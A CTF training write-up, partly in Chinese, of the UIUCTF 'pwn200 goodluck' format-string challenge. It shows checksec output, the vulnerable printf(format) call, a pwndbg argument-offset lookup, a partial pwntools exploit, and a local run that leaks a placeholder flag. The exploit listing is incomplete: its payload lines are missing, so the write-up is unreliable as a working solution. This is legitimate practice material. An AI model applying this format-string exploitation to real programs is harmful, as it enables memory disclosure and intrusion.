# zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck on git:master x [12:06:12] $ checksec goodluck [*] Checking for new versions of pwntools To disable this functionality, set the contents of /home/zer0ptr/.cache/.pwntools-cache-3.10/update to 'never' (old way). Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide): [update] interval=never [*] You have the latest version of Pwntools (4.15.0) [*] '/home/zer0ptr/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck/goodluck' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) Stripped: No
可以看出程序开启了 NX 保护以及部分 RELRO 保护。
分析程序
1 2 3 4 5 6 7 8 9 10 11 12 13
for ( j = 0; j <= 21; ++j ) { v5 = format[j]; if ( !v5 || v11[j] != v5 ) { puts("You answered:"); printf(format); puts("\nBut that was totally wrong lol get rekt"); fflush(_bss_start); result = 0; goto LABEL_11; } }
────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> fmtarg 0x7fffffffdcf8 The index of format argument : 10 (\"\%9$p\")
Exploit
1 2 3 4 5 6 7 8 9 10 11 12
from pwn import *
context(arch='amd64', os='linux') goodluck = ELF('./goodluck') sh = process('./goodluck')
# zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck on git:master x [12:12:00] C:130 $ python3 exp.py [*] '/home/zer0ptr/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck/goodluck' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) Stripped: No [+] Starting local process './goodluck': pid 7481 [*] Process './goodluck' stopped with exit code 0 (pid 7481) b"what's the flag\nYou answered:\nflag{flag}\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\nBut that was totally wrong lol get rekt\n" [*] Switching to interactive mode [*] Got EOF while reading in interactive $